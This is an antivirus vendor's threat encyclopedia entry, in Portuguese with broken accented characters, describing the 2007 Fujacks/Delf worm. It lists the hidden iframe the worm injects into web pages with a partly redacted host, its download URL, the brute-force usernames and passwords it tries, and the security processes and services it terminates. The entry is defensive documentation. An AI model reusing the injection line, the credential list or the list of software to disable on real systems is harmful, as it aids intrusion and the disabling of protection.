Precisa de ajuda? Peça à comunidade ou contrate um perito.
Acesse a Avira Answers
VrusTR/Proxy.Delf.CA
Data em que surgiu:26/02/2007
Tipo:Worm
Includo na lista "In The Wild"Sim
Nvel de danos:Baixo
Nvel de distribuio:Mdio
Nvel de risco:Mdio
Ficheiro esttico:Sim
Tamanho:28.833 Bytes
MD5 checksum:916ede7e54c83f11f0f99f7e53178a3b
Verso IVDF:6.37.01.162 - segunda-feira, 26 de fevereiro de 2007

 Vulgarmente Meios de transmisso:
   • Rede local
   • Unidade de rede


Alias:
   •  Mcafee: W32/Fujacks
   •  Kaspersky: Worm.Win32.Delf.bd
   •  F-Secure: Worm.Win32.Delf.bd
   •  Sophos: W32/Fujacks-AU
   •  Grisoft: Worm/Delf.AEP
   •  Eset: Win32/Fujacks.O
   •  Bitdefender: Win32.Worm.Fujacks.J


Sistemas Operativos:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Efeitos secundrios:
   • Desactiva aplicaes de segurana
   • Descarrega ficheiros
   • Descarrega ficheiros
   • Baixa as definies de segurana
   • Altera o registo do Windows

 Ficheiros Autocopia-se para as seguintes localizaes
   • %SYSDIR%\drivers\spoclsv.exe
   • %unidade%\setup.exe



So acrescentadas vrias seces aos ficheiros.
– Para: %todas as pastas%\*.htm Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

Renomeia um ficheiro depois do sistema reinicializar.
– Para: %todas as pastas%\*.html Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas as pastas%\*.asp Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas as pastas%\*.php Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas as pastas%\*.jsp Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe

– Para: %todas as pastas%\*.aspx Com os contedos seguintes:
   • iframe src=http://www.krvkr.com/********** width=0 height=0 /iframe




So criados os seguintes ficheiros:

%todas as pastas%\Desktop_.ini um ficheiro de texto no malicioso com o seguinte contedo:
   • %data actual%

%unidade%\autorun.inf um ficheiro de texto no malicioso com o seguinte contedo:
   • %cdigo que executa malware%




Tenta efectuar o download do ficheiro:

A partir da seguinte localizao:
   • http://www.baidu8.org/**********/xm.txt
Este ficheiro pode conter localizaes de descarregamento adicionais e poder servir como fonte para novas ameaas .

 Registry (Registo do Windows) A chave seguinte adicionada (num loop infinito) ao registo, para executar os processos depois de reinicializar.

  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • %SYSDIR%\drivers\spoclsv.exe



Os valores da seguinte chave Registo so eliminados:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



O seguinte valor do registo alterado:

Desactiva o Regedit e o Gestor de Tarefas:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Valor anterior:
   • CheckedValue = %definies do utilizador %
   Valor recente:
   • CheckedValue = 0

 Infeco da rede  Para assegurar a sua propagao o malware tenta ligar-se a outras mquinas como descrito abaixo.


Usa a seguinte informao de login para ganhar acesso mquina remota:

A seguinte lista de nomes de utilizadores:
   • Administrator
   • Guest
   • admin
   • Root

A seguinte lista de palavras-chave:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



Criao de endereos IP:
Gera endereos IP aleatoriamente, guardando somente os trs primeiros octetos do seu endereo. De seguida tenta estabelecer ligao com os endereos gerados.


Processo de infeco:
O ficheiro descarregado armazenado na mquina a atacar: %todas as pastas partilhadas%\GameSetup.exe


Lentido:
Cria o seguinte nmero de processos de infeco: 9
Dependendo da sua largura da banda poder notar uma baixa de velocidade da rede. Como a actividade de rede para este malware de nvel mdio se tiver uma ligao de banda larga o utilizador pode no se aperceber de nada.
O utilizador tambm pode notar uma leve baixa na velocidade devido aos mltiplos processos de rede criados.

 Terminar o processo A seguinte lista de processos so terminados:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

So terminados os processos que contm um dos titulos seguintes:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


Lista de servios desactivados:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Detalhes do ficheiro Linguagem de programao:
O programa de malware est escrito em Delphi.


Empacotador de Runtime:
De forma a agravar a deteco e reduzir o tamanho do ficheiro lanado com o seguinte empacotador de runtime:
   • FSG

Descrição enviada por Andrei Gherman em quinta-feira, 19 de junho de 2008
Descrição atualizada por Andrei Gherman em quinta-feira, 19 de junho de 2008

Voltar . . . .
https:// Esta janela é criptografada para sua segurança.